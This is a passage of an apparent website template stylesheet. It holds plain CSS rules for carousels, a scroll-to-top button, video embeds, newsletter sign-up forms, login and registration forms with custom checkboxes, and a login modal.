}
.sp-social-share ul li {
  display: inline-block;
  font-size: 24px;
  margin: 0 5px;
}
.dl-horizontal dt {
  margin: 8px 0;
  text-align: left;
}
.page-header {
  padding-bottom: 15px;
}
table.category {
  width: 100%;
}
table.category thead >tr,
table.category tbody >tr {
  border: 1px solid #f2f2f2;
}
table.category thead >tr th,
table.category thead >tr td,
table.category tbody >tr th,
table.category tbody >tr td {
  padding: 10px;
}
.contact-form .form-actions {
  background: none;
  border: none;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  color: #fff;
}
.entry-gallery.carousel .carousel,
.entry-gallery.carousel .carousel-inner,
.entry-gallery.carousel .carousel-inner .item {
  height: 100%;
}
.entry-gallery.carousel .carousel-left,
.entry-gallery.carousel .carousel-right {
  position: absolute;
  top: 50%;
  font-size: 24px;
  width: 36px;
  height: 36px;
  line-height: 34px;
  margin-top: -18px;
  text-align: center;
  color: #fff;
  background: rgba(0,0,0,0.2);
  border-radius: 4px;
}
.entry-gallery.carousel .carousel-left:hover,
.entry-gallery.carousel .carousel-left:focus,
.entry-gallery.carousel .carousel-right:hover,
.entry-gallery.carousel .carousel-right:focus {
  color: #fff;
}
.entry-gallery.carousel .carousel-left >.fa,
.entry-gallery.carousel .carousel-left >.fas,
.entry-gallery.carousel .carousel-left >.far,
.entry-gallery.carousel .carousel-right >.fa,
.entry-gallery.carousel .carousel-right >.fas,
.entry-gallery.carousel .carousel-right >.far {
  width: 32px;
  text-align: center;
}
.entry-gallery.carousel .carousel-left {
  left: 10px;
  padding-right: 1px;
}
.entry-gallery.carousel .carousel-right {
  right: 10px;
  padding-left: 3px;
}
.entry-gallery.carousel:hover .carousel-left:hover,
.entry-gallery.carousel:hover .carousel-right:hover {
  background: rgba(0,0,0,0.4);
}
.entry-gallery.carousel.carousel-fade .carousel-inner .item {
  width: 100%;
  transition-property: opacity;
}
.entry-gallery.carousel.carousel-fade .carousel-inner .item,
.entry-gallery.carousel.carousel-fade .carousel-inner .active.left,
.entry-gallery.carousel.carousel-fade .carousel-inner .active.right {
  opacity: 0;
}
.entry-gallery.carousel.carousel-fade .carousel-inner .active,
.entry-gallery.carousel.carousel-fade .carousel-inner .next.left,
.entry-gallery.carousel.carousel-fade .carousel-inner .prev.right {
  opacity: 1;
}
.entry-gallery.carousel.carousel-fade .carousel-inner .next,
.entry-gallery.carousel.carousel-fade .carousel-inner .prev,
.entry-gallery.carousel.carousel-fade .carousel-inner .active.left,
.entry-gallery.carousel.carousel-fade .carousel-inner .active.right {
  left: 0;
  transform: translate3d(0,0,0);
}
.entry-gallery.carousel.carousel-fade .carousel-control {
  z-index: 2;
}
.bold i.pe {
  font-weight: 600;
}
.bold .sppb-btn i.pe {
  font-weight: 600;
}
.desaturate li:hover .overlay {
  -webkit-filter: none;
}
.desaturate a img:hover {
  -webkit-transition: all .5s ease-in-out;
  -moz-transition: all .5s ease-in-out;
  -o-transition: all .5s ease-in-out;
  transition: all .5s ease-in-out;
  -webkit-filter: grayscale(100%);
  -moz-filter: grayscale(100%);
  -ms-filter: grayscale(100%);
  -o-filter: grayscale(100%);
  filter: grayscale(100%);
  filter: url("data:image/svg+xml;utf8,<svg version='1.1' xmlns='http://www.w3.org/2000/svg' height='0'><filter id='greyscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0' /></filter></svg>#greyscale");
  filter: gray;
  -webkit-filter: grayscale(1);
}
.desaturate a:hover {
  overflow: hidden;
}
.desaturate a:hover >img.desaturate {
  -webkit-transition: all .5s ease-in-out .1s;
  -moz-transition: all .5s ease-in-out .1s;
  -o-transition: all .5s ease-in-out .1s;
  transition: all .5s ease-in-out .1s;
  -webkit-filter: grayscale(100%) brightness(1.3);
  -moz-filter: grayscale(100%) brightness(1.3) blur(1px);
  -ms-filter: grayscale(100%) brightness(1.3) blur(1px);
  -o-filter: grayscale(100%) brightness(1.3) blur(1px);
  filter: grayscale(100%) brightness(1.3) blur(1px);
  filter: url("data:image/svg+xml;utf8,<svg version='1.1' xmlns='http://www.w3.org/2000/svg' height='0'><filter id='greyscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0' /></filter></svg>#greyscale");
  filter: gray;
}
a#scroll-top {
  opacity: 0;
  -moz-opacity: 0;
  -webkit-opacity: 0;
  filter: alpha(opacity=0);
  visibility: hidden;
  position: fixed;
  right: -40px;
  bottom: 1px;
  height: 54px;
  width: 54px;
  line-height: 54px;
  border-radius: 4px;
  background: transparent;
  z-index: 9;
  -webkit-transition: all .7s cubic-bezier(0.405,0.020,0.325,0.950) .2s;
  -moz-transition: all .7s cubic-bezier(0.405,0.020,0.325,0.950) .2s;
  -o-transition: all .7s cubic-bezier(0.405,0.020,0.325,0.950) .2s;
  transition: all .7s cubic-bezier(0.405,0.020,0.325,0.950) .2s;
}
a#scroll-top.open {
  right: 10px;
  opacity: 0.8;
  -moz-opacity: 0.8;
  -webkit-opacity: 0.8;
  filter: alpha(opacity=80);
  visibility: visible;
}
a#scroll-top >i {
  color: #777;
  height: 56px;
  width: 56px;
  line-height: 1;
  text-align: center;
  font-size: 56px;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
a#scroll-top:hover {
  opacity: 1;
  -moz-opacity: 1;
  -webkit-opacity: 1;
  filter: alpha(opacity=100);
}
a#scroll-top:hover >i {
  color: #333;
}
.flex-video {
  position: relative;
  padding-top: 45px;
  padding-bottom: 56.4%;
  height: 0;
  overflow: hidden;
}
.flex-video.widescreen {
  padding-bottom: 50%;
}
.flex-video.flex-video.vimeo {
  padding-top: 0;
}
.flex-video.flex-video.youtube {
  padding-top: 0;
}
.flex-video.flex-video.html5 {
  padding-top: 0;
}
.flex-video.flex-video .video-js {
  width: 100%;
}
.flex-video iframe {
  border: none;
  outline: none;
  margin-top: -1px;
}
.flex-video iframe,
.flex-video object,
.flex-video embed {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
.sp-layer .btn {
  border-radius: 7px;
  margin-right: 10px;
  font-size: 210%;
  line-height: 1.5;
  padding: 14px 50px 15px;
}
.acymailing_form {
  position: relative;
  width: 100%;
}
.acymailing_form input.inputbox {
  background: transparent;
}
.acymailing_form .acysubbuttons {
  position: absolute;
  top: -20px;
  right: -10px;
  overflow: hidden;
}
.acymailing_form .acysubbuttons input {
  text-indent: -9999px;
  padding: 0;
  border: none;
  width: 44px;
  height: 34px;
  border-radius: 0 4px 4px 0;
}
.acymailing_form .acysubbuttons::before {
  font-family: "peIcon7";
  content: "\e639";
  width: 34px;
  font-size: 110%;
  text-align: center;
  color: #fff;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%,-50%);
  pointer-events: none;
  -webkit-transition: all .2s ease;
  -moz-transition: all .2s ease;
  -o-transition: all .2s ease;
  transition: all .2s ease;
}
.acymailing_form .acysubbuttons:hover::before {
  font-family: "peIcon7";
  content: "\e63a";
  transform: translate(-50%,-56%);
}
.acymailing_form .acyterms input,
.acymailing_form .fieldacyterms input {
  display: inline-block;
  margin-right: 5px;
}
.dark .acymailing_form input.inputbox {
  opacity: .8;
}
.dark .acym_module_form input.cell {
  background: transparent;
}
.acym_module_form {
  position: relative;
}
.acym_module_form input.cell {
  width: 100%;
  background: transparent;
}
.acym_module_form .btn {
  margin: 0 auto;
}
.acym_module_form .acysubbuttons-icon {
  position: absolute;
  top: 0;
  right: 0;
  color: yellow;
}
.acym_module_form .acysubbuttons-icon input.icon_button_subscribe {
  padding: 0;
  border: none;
  width: 44px;
  height: 34px;
  line-height: 44px;
}
.acym_module_form .acysubbuttons-icon::before {
  font-family: "peIcon7";
  content: "\e639";
  position: absolute;
  top: 0;
  right: 0;
  width: 42px;
  height: 34px;
  line-height: 34px;
  font-size: 110%;
  text-align: center;
  color: #fff;
  pointer-events: none;
  border-radius: 0 4px 4px 0;
}
#system-message-container .alert-error {
  color: #a94442;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.login .login-description,
.registration .login-description,
.registration-wrapper .login-description,
.form-validate .login-description {
  margin-bottom: 30px;
}
.login .form-group,
.registration .form-group,
.registration-wrapper .form-group,
.form-validate .form-group {
  margin-bottom: 20px;
}
.login .form-group .group-control input,
.registration .form-group .group-control input,
.registration-wrapper .form-group .group-control input,
.form-validate .form-group .group-control input {
  min-height: 40px;
}
.login .form-links,
.registration .form-links,
.registration-wrapper .form-links,
.form-validate .form-links {
  display: inline-block;
  margin: 0 10px;
}
.login .form-links a,
.registration .form-links a,
.registration-wrapper .form-links a,
.form-validate .form-links a {
  font-weight: 600;
}
.login .form-footer,
.registration .form-footer,
.registration-wrapper .form-footer,
.form-validate .form-footer {
  margin: 30px auto;
  padding-top: 20px;
  border-top: 1px solid #e5e5e5;
  text-align: center;
}
.login img,
.registration img,
.registration-wrapper img,
.form-validate img {
  display: inline-block;
  margin: 20px 0;
}
.login .title,
.registration .title,
.registration-wrapper .title,
.form-validate .title {
  margin: 35px auto;
}
.login .title i.pe,
.registration .title i.pe,
.registration-wrapper .title i.pe,
.form-validate .title i.pe {
  font-size: 36px;
  line-height: 37px;
  vertical-align: top;
  margin: -1px 8px 0 0;
}
.login fieldset,
.registration fieldset,
.registration-wrapper fieldset,
.form-validate fieldset {
  margin: 35px auto 15px;
}
.login fieldset:first-child,
.registration fieldset:first-child,
.registration-wrapper fieldset:first-child,
.form-validate fieldset:first-child {
  margin: 10px auto;
}
.login fieldset .field-calendar button.btn,
.registration fieldset .field-calendar button.btn,
.registration-wrapper fieldset .field-calendar button.btn,
.form-validate fieldset .field-calendar button.btn {
  margin-top: 1px;
  box-shadow: 0 0 0 1px #ccc;
  background: #f8f8f8;
}
.login fieldset .field-calendar button.btn:hover,
.registration fieldset .field-calendar button.btn:hover,
.registration-wrapper fieldset .field-calendar button.btn:hover,
.form-validate fieldset .field-calendar button.btn:hover {
  box-shadow: 0 0 0 1px #bbb;
  background: #f5f5f5;
}
.login fieldset .field-calendar .icon-calendar:before,
.registration fieldset .field-calendar .icon-calendar:before,
.registration-wrapper fieldset .field-calendar .icon-calendar:before,
.form-validate fieldset .field-calendar .icon-calendar:before {
  font-family: 'Font Awesome 5 Free';
  content: "\f073";
  font-style: normal;
  font-weight: 400;
  font-size: 1.25em;
  line-height: 1.05;
  color: #777;
  text-shadow: 0 1px 0 #fff;
}
.login fieldset .field-calendar .calendar-container table,
.registration fieldset .field-calendar .calendar-container table,
.registration-wrapper fieldset .field-calendar .calendar-container table,
.form-validate fieldset .field-calendar .calendar-container table {
  max-width: 300px;
}
.login label#jform_profile_tos-lbl,
.login #jform_terms_terms-lbl,
.login #jform_consentbox-lbl,
.registration label#jform_profile_tos-lbl,
.registration #jform_terms_terms-lbl,
.registration #jform_consentbox-lbl,
.registration-wrapper label#jform_profile_tos-lbl,
.registration-wrapper #jform_terms_terms-lbl,
.registration-wrapper #jform_consentbox-lbl,
.form-validate label#jform_profile_tos-lbl,
.form-validate #jform_terms_terms-lbl,
.form-validate #jform_consentbox-lbl {
  position: relative;
  margin: 4px 20px 0 0;
  float: left;
  display: inline-block;
}
.login label#jform_profile_tos-lbl a,
.login #jform_terms_terms-lbl a,
.login #jform_consentbox-lbl a,
.registration label#jform_profile_tos-lbl a,
.registration #jform_terms_terms-lbl a,
.registration #jform_consentbox-lbl a,
.registration-wrapper label#jform_profile_tos-lbl a,
.registration-wrapper #jform_terms_terms-lbl a,
.registration-wrapper #jform_consentbox-lbl a,
.form-validate label#jform_profile_tos-lbl a,
.form-validate #jform_terms_terms-lbl a,
.form-validate #jform_consentbox-lbl a {
  display: inline-table;
  position: relative;
  color: #000000;
  padding: 2px 1px;
}
.login label#jform_profile_tos-lbl a:before,
.login #jform_terms_terms-lbl a:before,
.login #jform_consentbox-lbl a:before,
.registration label#jform_profile_tos-lbl a:before,
.registration #jform_terms_terms-lbl a:before,
.registration #jform_consentbox-lbl a:before,
.registration-wrapper label#jform_profile_tos-lbl a:before,
.registration-wrapper #jform_terms_terms-lbl a:before,
.registration-wrapper #jform_consentbox-lbl a:before,
.form-validate label#jform_profile_tos-lbl a:before,
.form-validate #jform_terms_terms-lbl a:before,
.form-validate #jform_consentbox-lbl a:before {
  font-family: 'Font Awesome 5 Free';
  content: "\f15c";
  font-style: normal;
  font-weight: 400;
  font-size: 1.1em;
  line-height: 1.2;
  margin: -4px 6px 0 0;
  color: #888;
}
.login label#jform_profile_tos-lbl a:hover,
.login label#jform_profile_tos-lbl a:hover:before,
.login #jform_terms_terms-lbl a:hover,
.login #jform_terms_terms-lbl a:hover:before,
.login #jform_consentbox-lbl a:hover,
.login #jform_consentbox-lbl a:hover:before,
.registration label#jform_profile_tos-lbl a:hover,
.registration label#jform_profile_tos-lbl a:hover:before,
.registration #jform_terms_terms-lbl a:hover,
.registration #jform_terms_terms-lbl a:hover:before,
.registration #jform_consentbox-lbl a:hover,
.registration #jform_consentbox-lbl a:hover:before,
.registration-wrapper label#jform_profile_tos-lbl a:hover,
.registration-wrapper label#jform_profile_tos-lbl a:hover:before,
.registration-wrapper #jform_terms_terms-lbl a:hover,
.registration-wrapper #jform_terms_terms-lbl a:hover:before,
.registration-wrapper #jform_consentbox-lbl a:hover,
.registration-wrapper #jform_consentbox-lbl a:hover:before,
.form-validate label#jform_profile_tos-lbl a:hover,
.form-validate label#jform_profile_tos-lbl a:hover:before,
.form-validate #jform_terms_terms-lbl a:hover,
.form-validate #jform_terms_terms-lbl a:hover:before,
.form-validate #jform_consentbox-lbl a:hover,
.form-validate #jform_consentbox-lbl a:hover:before {
  color: #f14833;
}
.login label#jform_profile_tos-lbl ~ div,
.login #jform_terms_terms-lbl ~ div,
.login #jform_consentbox-lbl ~ div,
.registration label#jform_profile_tos-lbl ~ div,
.registration #jform_terms_terms-lbl ~ div,
.registration #jform_consentbox-lbl ~ div,
.registration-wrapper label#jform_profile_tos-lbl ~ div,
.registration-wrapper #jform_terms_terms-lbl ~ div,
.registration-wrapper #jform_consentbox-lbl ~ div,
.form-validate label#jform_profile_tos-lbl ~ div,
.form-validate #jform_terms_terms-lbl ~ div,
.form-validate #jform_consentbox-lbl ~ div {
  margin: 15px 0 25px;
}
.login label#jform_privacyconsent_privacy-lbl,
.registration label#jform_privacyconsent_privacy-lbl,
.registration-wrapper label#jform_privacyconsent_privacy-lbl,
.form-validate label#jform_privacyconsent_privacy-lbl {
  position: relative;
  margin: 4px 20px 0 0;
  float: left;
  display: inline-block;
}
.login label#jform_privacyconsent_privacy-lbl a,
.registration label#jform_privacyconsent_privacy-lbl a,
.registration-wrapper label#jform_privacyconsent_privacy-lbl a,
.form-validate label#jform_privacyconsent_privacy-lbl a {
  display: inline-table;
  position: relative;
  color: #000000;
  padding: 2px 1px;
}
.login label#jform_privacyconsent_privacy-lbl a:before,
.registration label#jform_privacyconsent_privacy-lbl a:before,
.registration-wrapper label#jform_privacyconsent_privacy-lbl a:before,
.form-validate label#jform_privacyconsent_privacy-lbl a:before {
  font-family: 'Font Awesome 5 Free';
  content: "\f15c";
  font-weight: 400;
  font-size: 1.1em;
  line-height: 1.2;
  margin: -4px 6px 0 0;
  color: #888;
}
.login label#jform_privacyconsent_privacy-lbl a:hover,
.login label#jform_privacyconsent_privacy-lbl a:hover:before,
.registration label#jform_privacyconsent_privacy-lbl a:hover,
.registration label#jform_privacyconsent_privacy-lbl a:hover:before,
.registration-wrapper label#jform_privacyconsent_privacy-lbl a:hover,
.registration-wrapper label#jform_privacyconsent_privacy-lbl a:hover:before,
.form-validate label#jform_privacyconsent_privacy-lbl a:hover,
.form-validate label#jform_privacyconsent_privacy-lbl a:hover:before {
  color: #f14833;
}
.login label#jform_privacyconsent_privacy-lbl span.star,
.registration label#jform_privacyconsent_privacy-lbl span.star,
.registration-wrapper label#jform_privacyconsent_privacy-lbl span.star,
.form-validate label#jform_privacyconsent_privacy-lbl span.star {
  position: relative;
}
.login #jform_profile_tos input[type="radio"],
.login #jform_privacyconsent_privacy input[type="radio"],
.login #jform_terms_terms input[type="radio"],
.registration #jform_profile_tos input[type="radio"],
.registration #jform_privacyconsent_privacy input[type="radio"],
.registration #jform_terms_terms input[type="radio"],
.registration-wrapper #jform_profile_tos input[type="radio"],
.registration-wrapper #jform_privacyconsent_privacy input[type="radio"],
.registration-wrapper #jform_terms_terms input[type="radio"],
.form-validate #jform_profile_tos input[type="radio"],
.form-validate #jform_privacyconsent_privacy input[type="radio"],
.form-validate #jform_terms_terms input[type="radio"] {
  opacity: 0;
  visibilty: hidden;
  margin: 8px 0 0 3px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.login #jform_profile_tos label,
.login #jform_privacyconsent_privacy label,
.login #jform_terms_terms label,
.registration #jform_profile_tos label,
.registration #jform_privacyconsent_privacy label,
.registration #jform_terms_terms label,
.registration-wrapper #jform_profile_tos label,
.registration-wrapper #jform_privacyconsent_privacy label,
.registration-wrapper #jform_terms_terms label,
.form-validate #jform_profile_tos label,
.form-validate #jform_privacyconsent_privacy label,
.form-validate #jform_terms_terms label {
  position: relative;
  display: inline-block;
  padding: 2px 8px;
  text-indent: 18px;
}
.login #jform_profile_tos label::before,
.login #jform_profile_tos label::after,
.login #jform_privacyconsent_privacy label::before,
.login #jform_privacyconsent_privacy label::after,
.login #jform_terms_terms label::before,
.login #jform_terms_terms label::after,
.registration #jform_profile_tos label::before,
.registration #jform_profile_tos label::after,
.registration #jform_privacyconsent_privacy label::before,
.registration #jform_privacyconsent_privacy label::after,
.registration #jform_terms_terms label::before,
.registration #jform_terms_terms label::after,
.registration-wrapper #jform_profile_tos label::before,
.registration-wrapper #jform_profile_tos label::after,
.registration-wrapper #jform_privacyconsent_privacy label::before,
.registration-wrapper #jform_privacyconsent_privacy label::after,
.registration-wrapper #jform_terms_terms label::before,
.registration-wrapper #jform_terms_terms label::after,
.form-validate #jform_profile_tos label::before,
.form-validate #jform_profile_tos label::after,
.form-validate #jform_privacyconsent_privacy label::before,
.form-validate #jform_privacyconsent_privacy label::after,
.form-validate #jform_terms_terms label::before,
.form-validate #jform_terms_terms label::after {
  position: absolute;
  content: "";
  display: inline-block;
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
}
.login #jform_profile_tos label::before,
.login #jform_privacyconsent_privacy label::before,
.login #jform_terms_terms label::before,
.registration #jform_profile_tos label::before,
.registration #jform_privacyconsent_privacy label::before,
.registration #jform_terms_terms label::before,
.registration-wrapper #jform_profile_tos label::before,
.registration-wrapper #jform_privacyconsent_privacy label::before,
.registration-wrapper #jform_terms_terms label::before,
.form-validate #jform_profile_tos label::before,
.form-validate #jform_privacyconsent_privacy label::before,
.form-validate #jform_terms_terms label::before {
  height: 18px;
  width: 18px;
  border: 1px solid #aaa;
  border-radius: 3px;
  left: 0px;
  top: 6px;
}
.login #jform_profile_tos label::after,
.login #jform_privacyconsent_privacy label::after,
.login #jform_terms_terms label::after,
.registration #jform_profile_tos label::after,
.registration #jform_privacyconsent_privacy label::after,
.registration #jform_terms_terms label::after,
.registration-wrapper #jform_profile_tos label::after,
.registration-wrapper #jform_privacyconsent_privacy label::after,
.registration-wrapper #jform_terms_terms label::after,
.form-validate #jform_profile_tos label::after,
.form-validate #jform_privacyconsent_privacy label::after,
.form-validate #jform_terms_terms label::after {
  height: 6px;
  width: 11px;
  border: 0;
  border-left: 2px solid white;
  border-bottom: 2px solid white;
  box-shadow: 0 1px 0 0 rgba(0,0,0,0.25);
  transform: rotate(-45deg);
  left: 4px;
  top: 11px;
}
.login #jform_profile_tos label:hover::before,
.login #jform_privacyconsent_privacy label:hover::before,
.login #jform_terms_terms label:hover::before,
.registration #jform_profile_tos label:hover::before,
.registration #jform_privacyconsent_privacy label:hover::before,
.registration #jform_terms_terms label:hover::before,
.registration-wrapper #jform_profile_tos label:hover::before,
.registration-wrapper #jform_privacyconsent_privacy label:hover::before,
.registration-wrapper #jform_terms_terms label:hover::before,
.form-validate #jform_profile_tos label:hover::before,
.form-validate #jform_privacyconsent_privacy label:hover::before,
.form-validate #jform_terms_terms label:hover::before {
  border: 1px solid #f14833;
}
.login #jform_profile_tos input[type="radio"] + label::after,
.login #jform_privacyconsent_privacy input[type="radio"] + label::after,
.login #jform_terms_terms input[type="radio"] + label::after,
.registration #jform_profile_tos input[type="radio"] + label::after,
.registration #jform_privacyconsent_privacy input[type="radio"] + label::after,
.registration #jform_terms_terms input[type="radio"] + label::after,
.registration-wrapper #jform_profile_tos input[type="radio"] + label::after,
.registration-wrapper #jform_privacyconsent_privacy input[type="radio"] + label::after,
.registration-wrapper #jform_terms_terms input[type="radio"] + label::after,
.form-validate #jform_profile_tos input[type="radio"] + label::after,
.form-validate #jform_privacyconsent_privacy input[type="radio"] + label::after,
.form-validate #jform_terms_terms input[type="radio"] + label::after {
  content: none;
}
.login #jform_profile_tos input[type="radio"]:checked + label::after,
.login #jform_privacyconsent_privacy input[type="radio"]:checked + label::after,
.login #jform_terms_terms input[type="radio"]:checked + label::after,
.registration #jform_profile_tos input[type="radio"]:checked + label::after,
.registration #jform_privacyconsent_privacy input[type="radio"]:checked + label::after,
.registration #jform_terms_terms input[type="radio"]:checked + label::after,
.registration-wrapper #jform_profile_tos input[type="radio"]:checked + label::after,
.registration-wrapper #jform_privacyconsent_privacy input[type="radio"]:checked + label::after,
.registration-wrapper #jform_terms_terms input[type="radio"]:checked + label::after,
.form-validate #jform_profile_tos input[type="radio"]:checked + label::after,
.form-validate #jform_privacyconsent_privacy input[type="radio"]:checked + label::after,
.form-validate #jform_terms_terms input[type="radio"]:checked + label::after {
  content: "";
}
.login #jform_profile_tos input[type="radio"]:checked + label::before,
.login #jform_privacyconsent_privacy input[type="radio"]:checked + label::before,
.login #jform_terms_terms input[type="radio"]:checked + label::before,
.registration #jform_profile_tos input[type="radio"]:checked + label::before,
.registration #jform_privacyconsent_privacy input[type="radio"]:checked + label::before,
.registration #jform_terms_terms input[type="radio"]:checked + label::before,
.registration-wrapper #jform_profile_tos input[type="radio"]:checked + label::before,
.registration-wrapper #jform_privacyconsent_privacy input[type="radio"]:checked + label::before,
.registration-wrapper #jform_terms_terms input[type="radio"]:checked + label::before,
.form-validate #jform_profile_tos input[type="radio"]:checked + label::before,
.form-validate #jform_privacyconsent_privacy input[type="radio"]:checked + label::before,
.form-validate #jform_terms_terms input[type="radio"]:checked + label::before {
  background: #f47363;
  border: 1px solid #e2270f;
}
#sbox-window {
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  padding: 0;
}
.sbox-content-iframe#sbox-content,
.sbox-content-iframe {
  overflow-y: hidden;
  padding: 3%;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}
#sbox-content iframe {
  width: 100%;
}
.content_rating,
.unseen.element-invisible,
span.content_vote {
  visibility: hidden;
  display: none;
}
.content_rating ~ img,
.unseen.element-invisible ~ img,
span.content_vote ~ img {
  visibility: hidden;
  display: none;
}
img[src$="rating_star.png"],
img[src$="rating_star_blank.png"] {
  visibility: hidden;
  display: none;
}
#login input[type="checkbox"],
#login-form input[type="checkbox"],
.login input[type="checkbox"] {
  opacity: 0;
  visibility: hidden;
  position: absolute;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  width: 1px;
  height: 1px;
}
#login label,
#login-form label,
.login label {
  position: relative;
  display: inline-block;
  vertical-align: middle;
  padding: 2px 8px;
  text-indent: 18px;
  cursor: pointer;
}
#login label::before,
#login label::after,
#login-form label::before,
#login-form label::after,
.login label::before,
.login label::after {
  position: absolute;
  content: "";
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
}
#login label::before,
#login-form label::before,
.login label::before {
  height: 18px;
  width: 18px;
  border: 1px solid #aaa;
  border-radius: 3px;
  left: 0;
  top: 5px;
}
#login label::after,
#login-form label::after,
.login label::after {
  height: 6px;
  width: 11px;
  border: 0;
  border-left: 2px solid white;
  border-bottom: 2px solid white;
  box-shadow: 0 1px 0 0 rgba(0,0,0,0.25);
  transform: rotate(-45deg);
  left: 4px;
  top: 10px;
}
#login label:hover::before,
#login-form label:hover::before,
.login label:hover::before {
  border: 1px solid #f14833;
}
#login input[type="checkbox"] + label::after,
#login-form input[type="checkbox"] + label::after,
.login input[type="checkbox"] + label::after {
  content: none;
}
#login input[type="checkbox"]:checked + label::after,
#login-form input[type="checkbox"]:checked + label::after,
.login input[type="checkbox"]:checked + label::after {
  content: "";
}
#login input[type="checkbox"]:checked + label::before,
#login-form input[type="checkbox"]:checked + label::before,
.login input[type="checkbox"]:checked + label::before {
  background: #f47363;
  border: 1px solid #e2270f;
}
.checkbox label {
  cursor: pointer;
}
.checkbox label input[type="checkbox"] {
  -webkit-appearance: none;
  -moz-appearance: none;
  appearance: none;
  visibility: hidden;
  width: 22px;
  height: 18px;
  line-height: 1;
  top: 3px;
  background: transparent;
  border: none;
  outline: none;
  cursor: pointer;
  position: relative;
}
.checkbox label input[type="checkbox"]::before,
.checkbox label input[type="checkbox"]::after {
  position: absolute;
  content: "";
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
}
.checkbox label input[type="checkbox"]::before {
  visibility: visible;
  opacity: 1;
  height: 18px;
  width: 18px;
  border: 1px solid #aaa;
  border-radius: 3px;
  left: 0;
  top: 0;
}
.checkbox label input[type="checkbox"]::after {
  visibility: hidden;
  opacity: 0;
  height: 6px;
  width: 11px;
  border: 0;
  border-left: 2px solid white;
  border-bottom: 2px solid white;
  box-shadow: 0 1px 0 0 rgba(0,0,0,0.25);
  transform: rotate(-45deg);
  left: 4px;
  top: 5px;
}
.checkbox label input[type="checkbox"]:hover::before {
  border: 1px solid #f14833;
}
.checkbox label input[type="checkbox"]:checked::before {
  background: #f47363;
  border: 1px solid #e2270f;
  visibility: visible;
  opacity: 1;
}
.checkbox label input[type="checkbox"]:checked::after {
  visibility: visible;
  opacity: 1;
}
.form-links ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
.modal-login {
  text-align: center;
}
.modal-login .modal-content {
  border: 1px solid rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 4px 20px rgba(0,0,0,0.35);
  box-shadow: 0 4px 20px rgba(0,0,0,0.35);
}
.modal-backdrop {
  background: rgba(0,0,0,0.45);
}
.modal-backdrop.in {
  z-index: 110;
}
@media screen and (min-width: 768px) {
  .modal:before {
    display: inline-block;
    vertical-align: middle;
    content: " ";
    height: 100%;
  }
}
.modal-login .modal-dialog {
  display: inline-block;
  text-align: left;
  vertical-align: middle;
}
.top-divider {
  line-height: 1.2;
  position: absolute;
  top: 0;
  width: 1px;
  height: 100%;
  padding: 0;
  margin: 0;
  opacity: 0.2;
  border: 0;
  border-left: 1px solid #999;
}
.ap-modal-login {
  margin: -1px 0 -7px;
  padding: 0;
}
.ap-modal-login .ap-login,
.ap-modal-login .ap-signin {
  margin: 0;
  padding: 0;
  display: block;
}
.ap-modal-login .ap-login a,
.ap-modal-login .ap-signin a {
  padding: 0 10px;
  line-height: 20px;
  display: inline-block;
  vertical-align: top;
  margin-top: 0;
}
.ap-modal-login .ap-login a i.pe,
.ap-modal-login .ap-signin a i.pe {
  font-size: 22px;
  line-height: 20px;
  margin: 0 4px;
  vertical-align: middle;
}
.ap-modal-login .ap-login a .info-content,
.ap-modal-login .ap-signin a .info-content {
  vertical-align: middle;
}
.ap-modal-login .title {
  margin: 0 auto;
}
.ap-modal-login .title i.pe {
  font-size: 36px;
  line-height: 37px;
  vertical-align: top;
  margin: -1px 8px 0 0;
}
.ap-modal-login .modal-content {
  padding: 30px;
  font-size: 14px;
}
.ap-modal-login .modal-content .modal-header {
  border: none;
}
.ap-modal-login .modal-content .modal-body {
  margin-bottom: 30px;
}
.ap-modal-login .modal-content .modal-body .pretext {
  margin-bottom: 20px;
}
.ap-modal-login .modal-content .modal-body .posttext {
  margin-top: 20px;
}
.ap-modal-login .modal-content .modal-body .controls {
  margin: 20px auto 0;
}
.ap-modal-login .modal-content .modal-body .controls .input-prepend .add-on,
.ap-modal-login .modal-content .modal-body .controls .input-append .add-on {
  width: 50px;
  height: 44px;
}
.ap-modal-login .modal-content .modal-body .controls .input-prepend .add-on span,
.ap-modal-login .modal-content .modal-body .controls .input-append .add-on span {
  line-height: 32px;
  font-size: 16px;
  color: #909090;
}
.ap-modal-login .modal-content .modal-body .controls .input-prepend .add-on:hover span,
.ap-modal-login .modal-content .modal-body .controls .input-append .add-on:hover span {
  color: #555;
}
.ap-modal-login .modal-content .modal-body .controls input.form-control {
  min-height: 44px;
  width: 100%;
}
.ap-modal-login .modal-content .modal-body input[type="text"] {
  margin-bottom: 20px;
}
.ap-modal-login .modal-content .modal-body .button-wrap {
  position: relative;
  line-height: 42px;
  float: left;
}
.ap-modal-login .modal-content .modal-body input[type="submit"] {
  z-index: 1;
}
.ap-modal-login .modal-content .modal-body .input-block-level {
  min-height: 44px;
}
.ap-modal-login .modal-content .modal-body .remember-wrap {
  width: 100%;
  overflow: hidden;
  min-height: 70px;
  text-align: left;
}
.ap-modal-login .modal-content .modal-body .remember-wrap label {
  margin: 20px 0 0;
  vertical-align: middle;
}
.ap-modal-login .modal-content .modal-body .forget-name-link {
  max-height: 30px;
  line-height: 30px;
  font-weight: 400;
  margin-left: 10px;
  padding-top: 5px;
